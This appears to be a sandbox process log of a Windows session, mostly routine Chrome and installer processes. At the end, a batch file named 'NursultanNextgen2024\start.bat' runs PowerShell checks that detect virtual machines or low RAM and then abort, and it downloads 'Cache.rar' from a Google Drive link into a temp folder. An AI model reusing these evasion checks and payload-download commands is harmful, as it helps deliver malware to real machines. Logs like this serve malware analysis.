"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --mojo-platform-channel-handle=11268 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --mojo-platform-channel-handle=11448 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --mojo-platform-channel-handle=11620 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11200 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9836 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=11248 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Users\Admin\Downloads\avg_secure_browser_setup.exe
"C:\Users\Admin\Downloads\avg_secure_browser_setup.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9668 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\ajCD22.exe
"C:\Users\Admin\AppData\Local\Temp\ajCD22.exe" /relaunch=8 /was_elevated=1 /tagdata
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --mojo-platform-channel-handle=7332 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --mojo-platform-channel-handle=6864 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --mojo-platform-channel-handle=6612 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --mojo-platform-channel-handle=3556 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --mojo-platform-channel-handle=7536 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --mojo-platform-channel-handle=7468 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --mojo-platform-channel-handle=8584 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --mojo-platform-channel-handle=11872 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --mojo-platform-channel-handle=10368 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --mojo-platform-channel-handle=4704 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --mojo-platform-channel-handle=6348 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --mojo-platform-channel-handle=7436 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --mojo-platform-channel-handle=9540 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --mojo-platform-channel-handle=7368 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --mojo-platform-channel-handle=7200 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --mojo-platform-channel-handle=9196 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --mojo-platform-channel-handle=2240 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --mojo-platform-channel-handle=10112 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --mojo-platform-channel-handle=7864 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --mojo-platform-channel-handle=8596 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --mojo-platform-channel-handle=6220 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --mojo-platform-channel-handle=968 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --mojo-platform-channel-handle=7860 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --mojo-platform-channel-handle=6376 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --mojo-platform-channel-handle=2888 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --mojo-platform-channel-handle=9272 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --mojo-platform-channel-handle=9244 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --mojo-platform-channel-handle=7280 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --mojo-platform-channel-handle=9644 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --mojo-platform-channel-handle=4764 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --mojo-platform-channel-handle=8876 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --mojo-platform-channel-handle=11752 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --mojo-platform-channel-handle=11456 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --mojo-platform-channel-handle=10848 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --mojo-platform-channel-handle=11696 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=128 --mojo-platform-channel-handle=3152 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --mojo-platform-channel-handle=11364 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=130 --mojo-platform-channel-handle=10624 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --mojo-platform-channel-handle=7304 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=132 --mojo-platform-channel-handle=9392 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --mojo-platform-channel-handle=8312 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --mojo-platform-channel-handle=11596 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --mojo-platform-channel-handle=11492 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --mojo-platform-channel-handle=3212 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=137 --mojo-platform-channel-handle=9488 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=138 --mojo-platform-channel-handle=10576 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=139 --mojo-platform-channel-handle=5364 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=140 --mojo-platform-channel-handle=10004 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=141 --mojo-platform-channel-handle=9440 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=142 --mojo-platform-channel-handle=8732 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=143 --mojo-platform-channel-handle=9324 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=144 --mojo-platform-channel-handle=4712 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=145 --mojo-platform-channel-handle=8236 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=146 --mojo-platform-channel-handle=9100 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=147 --mojo-platform-channel-handle=9064 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=148 --mojo-platform-channel-handle=9252 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=149 --mojo-platform-channel-handle=10368 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10500 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10492 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x43c
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=152 --mojo-platform-channel-handle=9684 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10552 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1876 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10000 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Users\Admin\Downloads\cockroachondesktop.exe
"C:\Users\Admin\Downloads\cockroachondesktop.exe"
C:\Users\Admin\AppData\Local\Temp\is-O1UEC.tmp\cockroachondesktop.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O1UEC.tmp\cockroachondesktop.tmp" /SL5="$C0200,2560879,54272,C:\Users\Admin\Downloads\cockroachondesktop.exe"
C:\Program Files (x86)\Cockroach on Desktop\CockroachOnDesktop.exe
"C:\Program Files (x86)\Cockroach on Desktop\CockroachOnDesktop.exe"
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat" "
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
